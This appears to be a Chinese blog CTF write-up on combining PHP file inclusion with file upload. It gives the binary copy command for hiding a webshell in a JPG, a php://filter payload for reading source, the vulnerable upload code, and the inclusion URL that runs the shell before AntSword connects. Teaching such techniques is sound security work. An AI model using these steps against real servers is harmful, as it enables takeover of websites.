文件包含+文件上传漏洞(图片马绕过)

已于 2024-03-08 11:32:22 修改
阅读量2.2k 收藏 22
点赞数 10
分类专栏: web漏洞 文章标签: 文件包含 文件上传 图片马 php伪协议
于 2024-02-19 19:39:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/woshicainiao666/article/details/136175763
版权

目录

一.文件包含

将已有的代码以文件形式包含到某个指定的代码中,从而使用其中的代码或者数据,一般是为了方便直接调用所需文件,文件包含的存在使得开发变得更加灵活和方便(若对用户输入的数据不严格的过滤,会导致信息泄露,getshell等风险)

常见文件包含函数
include():当文件发生错误时,提出警告,脚本继续执行
include_once():如果文件被包含过,那将不再被包含
require():当文件发生错误时,提出警告,脚本停止执行
require_once():确保文件只被包含一次,但如果文件不存在或发生错误,脚本会停止执行

二.文件上传

文件上传是指:用户将本地的文件上传到目标服务器的过程(若对用户上传的文件,不经过严格的审核,会造成getshell,服务器被控等风险)

三.图片马

copy 正常图片.jpg /b + muma.php hack.jpg

就是将正常图片和木马文件合并成新的图片(带有木马的图片)
/b选项告诉copy命令以二进制模式处理这些文件

木马文件里面一句话木马前,要带空格
在这里插入图片描述
合并之后,记事本打开,出现完整的一句话木马,说明成功
在这里插入图片描述

四.题目

点击题目链接,空白页面,查看源代码,发现include.php
在这里插入图片描述
include.php的源代码,有一个upload.php,且告诉参数是file
在这里插入图片描述
访问upload,是文件上传页面,上传木马文件发现不行
在这里插入图片描述
通过文件包含,查看upload.php的源代码,(php伪协议)

?file=php://filter/read=convert.base64-encode/resource=upload.php

在这里插入图片描述base64解码
在这里插入图片描述代码分析,只是一个白名单过滤,对文件的后缀和文件类型进行判断

<form action="" enctype="multipart/form-data" method="post" 
name="upload">file:<input type="file" name="file" /><br> 
<input type="submit" value="upload" /></form>

<?php
if(!empty($_FILES["file"]))
{
    echo $_FILES["file"];
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    @$temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
    || (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
    || (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
    && (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
    {
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
        echo "file upload successful!Save in:  " . "upload/" . $_FILES["file"]["name"];
    }
    else
    {
        echo "upload failed!";
    }
}
?>

上传图片马,上传成功
在这里插入图片描述
文件包含图片马

?file=upload/j.jpg
看不到一句话木马,说明被解析了,通过蚁剑连接

在这里插入图片描述蚁剑连接
在这里插入图片描述根目录下发现flag
在这里插入图片描述

28-5 文件上传漏洞 - 图片
weixin_43263566的博客
03-20 1522
解析漏洞定义控制文件是否被当做后端脚本处理二、图片绕过图片;在图片中包含一句话木。利用其他解析漏洞如.htaccess等,对图片进行解析,执行其中的恶意代码。优势在于可以绕过多种防护机制。 1)使用Photoshop(ps),选择“文件”->“文件简介”,在文档标题或者作者处写入一句话木。 先准备一张图片(随便截图搞一张就好),然后准备一个一句话php文件 解释:
后渗透之文件包含&文件上传实验
xiongIT的博客
03-12 602
文件包含漏洞,是当服务器开启allow_url_include选项后,可包含文件被设置为变量,用户可以通过利用某些函数改变变量进而引入要包含的文件,并能控制这个动态变量,如果被恶意利用,而服务器端没有对文件的变量值进行严格校验,或者被攻击者绕过校验,从而导致恶意代码的注入,就导致了文件包含漏洞的产生。
文件上传笔记
2301_80313439的博客
02-21 928
**1.auto_append_file在木文件上传后上传auto_prepend_file在木文件上传前上传。
文件上传漏洞进阶教程/白名单绕过/图片制作/图片执行
ChenD的学习笔记
10-23 9507
文件上传漏洞进阶教程/白名单绕过/图片制作/图片执行
文件包含文件上传结合
weixin_44110913的博客
05-02 2361
文章目录文件包含文件上传结合条件:存在本地文件包含,并且可以找到上传路径上传图片,并找到路径(实战中路径是需要寻找的,使用拼接思路和爆破得到上传的路径) 文件包含文件上传结合 条件:存在本地文件包含,并且可以找到上传路径 1.制作图片(方式很多,这只是其中一种) 创建文件夹 在其中放入一张图片文件php.png,和php.php一句话木 php.php中的一句话木内容为 <?ph...
文件包含+文件上传
frutrue的博客
06-12 1373
文件包含+文件上传
web安全-文件上传漏洞-图片制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 7270
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
上传绕过php文件改为图片,文件上传漏洞另类绕过技巧及挖掘案例全汇总
weixin_28744601的博客
03-12 1572
文件上传漏洞作为获取服务器权限最快的方式,虽然相关资料很多,但很多人对上传校验方式、如何针对性绕过检测、哪种上传和解析的场景会产生危害等还是比较模糊。本文作一些阐述,然后补充一些除了上传webshell的其他非常规挖掘姿势,包括XSS、重定向、Dos、CSRF等等。1、基础知识:要深入了解文件上传,必须了解上传属性、常见文件的结构、图形处理函数等内容。1)报文特点:观察文件上传报文的特点:Hea...
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
html文件上传漏洞,文件上传漏洞绕过姿势)
weixin_31857829的博客
06-07 1635
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)文件上传校验姿...
文件上传漏洞绕过手法
热门推荐
dreamthe的博客
12-05 1万+
1.文件上传原理 有一些网站提供上传服务,比如头像的设置就是上传图片,或者上传文档,上传压缩包等等。一般网站是希望上传图片格式或者文本格式的,当如果检测手段不全面,就会导致攻击者直接上传了恶意的脚本代码,并执行了脚本代码,或者可以配合其他漏洞,上传代码文件,导致服务器被拿下。下面我们来说说文件上传的检测和绕过都有哪些。 2.文件上传检测方法 文件上传检测分为前端检测和后端检测。前端检测的绕过非常好绕过,前端检测就是在网页有一段检测代码,在你点击上传之前就会有一个检测,我们只需要将木文件先改成正常的图
文件上传{session文件包含以及条件竞争、图片文件渲染绕过(gif、png、jpg)}
最新发布
whale_waves的博客
03-06 1279
session.upload_progress.name是打开的,他会将post传输的和session.upload_progress同名的post参数个拉取到session里变成类似于变量的东西。png图片就复杂一点,大致原理就是,再png图片特定位置添加webshell,会导致src值改变,网站会验证src值所以这里需要利用到国外大佬写的脚本。在我们上传的图片的基础上修改格式内容尺寸之类的,并且会对部分内容进行更新替换,最后将处理过后的图片生成一个新的保存在指定的位置。jpg图片也是差不多的原理。
文件包含漏洞利用之本地包含配合文件上传包含图片&&文件包含漏洞利用之远程包含Webshell
m0_73720136的博客
05-07 6240
通过本实验,掌握文件上传+文件包含的组合漏洞,在绕过上传的检测时可以制作图片上传,图片上传成功不能直接解析,可以利用文件包含的特点进行解析图片。通过本实验,掌握在无其他漏洞,只有文件包含漏洞,且目标服务器本地无shell文件可利用,又可以远程文件包含时,可以在攻击机本地新建一个一句话木文件(比如:shell.txt,不要以.php的文件存在,因为php文件在操作机本地会被解析),然后远程包含攻击机本地新建的木文件,从而Getshell。
文件上传文件包含
Jeromeyoung
01-16 1684
文章目录文件包含漏洞测试代码远程文件包含本地文件包含本地包含图片实例本地包含绕过1、包含漏洞上传技巧(一句话图片等)2、包含日志文件3、PHP包含读文件4、PHP包含写文件(详解如下)5、包含截断绕过6、str_replace函数绕过(字符拼接)7、fnmatch函数绕过(通过内置协议)PHP内置协议 文件包含漏洞 简介: 包含操作,在大多数Web语言中都会提供的功能,但PHP对于包含文件所提供的功能太强大,太灵活,所以包含漏洞经常出现在PHP语言中,这也就导致了出现了一个错误现状,很多初学者认为包含漏
文件包含文件上传(个人学习笔记)
derryz的博客
10-04 719
ctf小白初学笔记
文件上传之文件内容检测与绕过图片
xdjxi的博客
02-22 2838
实验原理 文件上传从客户端进行检测显然是防护不足的,所以需要从服务器端进行防护。服务端的检测与绕过方法有很多,常见的有: 1.后缀名检测绕过 2.MIME类型检测与绕过 3,文件内容检测与绕过 4. 80截断绕过 5,条件竞争检测与绕过 文件内容的检测是利用 getimagesize)函数获取图片的宽高等信息,如果上传的不是图片,那么则获取不到信息。 文件内容检测的绕过常见的有两种方式: ·在脚本文件前面补充对应的文件头 常见的图片文件头 JPG:FF D8 FF Ee 0e 104A
文件上传图片
2301_80661529的博客
03-04 2627
图片:就是在正常图片中插入木
2-7 【实验】14-图片绕过+代码审计
山兔的博客
03-27 3724
这节课,我们要开始讲pass-13,讲的跟我们之前稍有点不一样,因为这个漏洞,它不是单个的利用,是结合其它漏洞一块去利用 今天的漏洞是上传图片到服务器,图片就是图片的一种木,就是带有木图片图片 注意的有三点: 1.保证上传后的图片中仍然包含完整的一句话或webshell代码。 2.使用文件包含漏洞能运行图片中的恶意代码。 这点就是我们这篇文章讲的组合漏洞的一个利用,就是利用文件包含漏洞 3.图片要.jpg,.png,.gif三种后缀都上传成功才算过关! 图片就是我们在图片当中插入一句
文件包含漏洞——实例
weixin_54055099的博客
09-24 3340
文件包含漏洞的实例
文件上传漏洞绕过策略解析
"本文主要介绍了文件上传漏洞的常见绕过方法,包括前端js检测、Content-Type验证、文件后缀验证、文件后缀黑名单、文件头验证、文件内容验证以及文件上传文件包含的结合。文章提供了针对这些验证的破解策略,如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值